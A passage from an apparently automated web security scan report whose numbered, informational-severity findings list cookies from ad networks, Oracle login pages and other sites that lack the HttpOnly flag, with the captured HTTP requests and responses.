__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

13.73. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/examples
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:34:07 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/i/blank.gif
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

13.74. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO?pv=98794510029.25635&cookie=&keyw=ATG+e-commerce+solutio HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=a93684bbe302491756ff3d9c64c60001

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:13 GMT
Connection: keep-alive
Set-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

13.75. http://d.ads.readwriteweb.com/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.ads.readwriteweb.com
Path:	/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ck.php HTTP/1.1
Host: d.ads.readwriteweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

13.76. http://d.ads.readwriteweb.com/spc.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.ads.readwriteweb.com
Path:	/spc.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 15:32:48 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /spc.php?zones=sp_1L%3D2%7Csp_1R%3D3%7Csp_2L%3D4%7Csp_2R%3D5%7Csp_3L%3D6%7Csp_3R%3D7%7Csp_4L%3D8%7Csp_4R%3D9%7Csp_5L%3D10%7Csp_5R%3D11%7Csp_6L%3D12%7Csp_6R%3D13%7C&nz=1&source=&r=16694381&block=1&blockcampaign=1&charset=UTF-8&loc=http%3A//www.readwriteweb.com/enterprise/2010/11/oracle.php&referer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio HTTP/1.1
Host: d.ads.readwriteweb.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=2d8e2bc8c26f44d8e042e1db3e94fe61; expires=Wed, 05-Sep-2012 15:32:48 GMT; path=/
Content-Size: 8267
Connection: close
Content-Type: application/x-javascript; charset=UTF-8
Content-Length: 8267

var OA_output = new Array();
OA_output['sp_1L'] = '';
OA_output['sp_1L'] += "<"+"a href=\'http://d.ads.readwriteweb.com/ck.php?oaparams=2__bannerid=185451__zoneid=2__cb=5eaacf5574__r_id=da06d5023c8bd
...[SNIP]...

13.77. http://d1.openx.org/ck.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/ck.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID=eed20980e83e7cfea7f31868510023af; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ck.php HTTP/1.1
Host: d1.openx.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=eed20980e83e7cfea7f31868510023af; expires=Wed, 05-Sep-2012 17:06:27 GMT; path=/
Content-Length: 0
Content-Type: text/html; charset=UTF-8

13.78. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.79. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/cgi-bin/shopcart/viewcart.cgi

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/shopcart/viewcart.cgi HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.80. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/db_pages.getpage

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.81. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.82. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.83. http://lct.salesforce.com/sfga.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lct.salesforce.com
Path:	/sfga.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerlct-pool=70574602.38687.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sfga.js HTTP/1.1
Host: lct.salesforce.com
Proxy-Connection: keep-alive
Referer: http://www.volusion.com/?_kk=%2Becommerce%20%2Bsolution&_kt=3fda914a-c56d-407d-b8c6-0b1636cef4d3&gclid=CKPJnbn4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:34:06 GMT
Set-Cookie: BIGipServerlct-pool=70574602.38687.0000; path=/
Content-Length: 9247

var _kd = document;
var _kdlh = _kd.location.href;
var _ki,_kq,_kv;
var _kwtlForm;
var _kretURL;
var _kwtlOnSubmit;
var _koid;

function __krand() {
return Math.round(Math.random() * 256).toString
...[SNIP]...

13.84. http://legolas.nexac.com/lgalt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://legolas.nexac.com
Path:	/lgalt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lgtix=SQACADUB; path=/; expires=Fri, 05 Sep 2014 14:59:01 GMT; domain=.legolas-media.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lgalt?ci=7&ti=73&sti=28&sei=0&sci=2&ai=0&mi=0&pbi=0&sts=1315321125460777&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1
Host: legolas.nexac.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: na_tc=Y; OAX=Mhd7ak48ZSEAAtYi

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 14:59:01 GMT
Server: Apache
Expires: -1
Cache-Control: no-cache; no-store
Content-Type: text/html; charset=iso-8859-1
Location: http://r.nexac.com/e/getdata.xgi?na_id=ignore&dt=br&pkey=mxpq23ivacz82&ru=http://rt.legolas-media.com/lgrt?ci=1%26ti=74%26vi=7%26sti=28%26sts=1315321125460777%26ui=fb069b82-5953-4473-8ae5-0a80415bcdc8%26na_id=<na_id>%26na_mp=<na_mp>%26na_da=<na_da>
Set-Cookie: lgtix=SQACADUB; path=/; expires=Fri, 05 Sep 2014 14:59:01 GMT; domain=.legolas-media.com
P3P: policyref="http://www.legolas-media.com/w3c/p3p.xml",CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Length: 462
Connection: close

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://r.nexac.com/e/getdata.xgi?na_id=ignore&a
...[SNIP]...

13.85. https://login.cnbc.com/cas/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/logout

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas/logout HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.86. https://login.oracle.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.87. https://login.oracle.com/mysso/signon.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/signon.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.88. https://login.oracle.com/mysso/sso_loginui/b-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/b-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.89. https://login.oracle.com/mysso/sso_loginui/b-l-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/b-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.90. https://login.oracle.com/mysso/sso_loginui/b-r-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/b-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.91. https://login.oracle.com/mysso/sso_loginui/gray-b-l-b.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-l-b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.92. https://login.oracle.com/mysso/sso_loginui/gray-b-l-t.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-l-t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.93. https://login.oracle.com/mysso/sso_loginui/gray-b-line.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-line.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.94. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-r-b.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.95. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-b-r-t.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpu6uHK6EVADUS1EHWFB01t_cD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;

13.96. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/gray-t-line.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.97. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/ip-o-logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.98. https://login.oracle.com/mysso/sso_loginui/loginStyling.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/loginStyling.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.99. https://login.oracle.com/mysso/sso_loginui/moc_lib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/moc_lib.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.100. https://login.oracle.com/mysso/sso_loginui/oracle-footer-tagline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/oracle-footer-tagline.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.101. https://login.oracle.com/mysso/sso_loginui/oralogo_small.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/oralogo_small.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.102. https://login.oracle.com/mysso/sso_loginui/red-b-l.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/red-b-l.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.103. https://login.oracle.com/mysso/sso_loginui/red-b-m-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/red-b-m-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.104. https://login.oracle.com/mysso/sso_loginui/red-b-r.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/red-b-r.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.105. https://login.oracle.com/mysso/sso_loginui/sso_check.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/sso_check.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:14 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.106. https://login.oracle.com/mysso/sso_loginui/t-bg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/t-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.107. https://login.oracle.com/mysso/sso_loginui/t-l-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/t-l-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:18 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.108. https://login.oracle.com/mysso/sso_loginui/t-r-corner.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.oracle.com
Path:	/mysso/sso_loginui/t-r-corner.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

